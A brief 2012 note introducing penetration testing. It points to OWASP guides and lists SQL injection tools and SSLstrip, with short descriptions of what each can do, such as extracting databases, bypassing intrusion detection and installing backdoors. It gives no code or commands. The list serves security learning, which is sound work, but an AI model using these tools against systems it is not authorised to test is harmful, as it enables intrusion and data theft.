Penetration Testing

Updated at 2012-05-04 06:26

This note is about penetration testing a.k.a. pentesting. Pentesting is evaluating system security by simulating attacks.

Check the most critical security flaws currently: OWASP Top Ten If you want to get more into it, read WASC Threat Classification

Browser based web service: SQL injection, XSS, CSRF.
Native client: buffer overflow.

There are many pentesting guides online, it is a good idea to start from those. OWASP Testing Guide

Here are some pentesting tools. You should use these only against your own databases to test if you can break them. Use these at your own risk.

Safe3 SQL Injector: One of the easiest SQL injection tool. If you get your system broken using this, you should be worried. MySQL, Oracle, PostgreSQL, SQL Server, Access, SQLite, Firebird, Sybase.

SQLninja: SQL injection to web applications using Microsoft SQL Server

SSLSTRIP: HTTPS stripping attack to break SSL.

BSQL Hacker: Framework for automating SQL injections. Oracle/MySQL. Auto extract database.

The Mole: Bypass IPD/IDS systems with generic filters, SQL injections. MySQL, SQL Server, PostgreSQL, Oracle.

Pangolin: SQL injection testing tool. MySQL, SQL Server, PostgreSQL, Oracle.

Sqlmap: SQL injection takeover tool. MySQL, PostgreSQL, SQL Server.

Havij: Advanced SQL injection tool for a target web page. Can gain access even to the OS. MySQL, Oracle, PostgresSQL, MS Access, Sybase.

Enema: Not automated tool but framework for professional penetration testers.

sqlsus: SQL injection and takeover tool. Download files from attached Web server. Install and control backdoors. MySQL.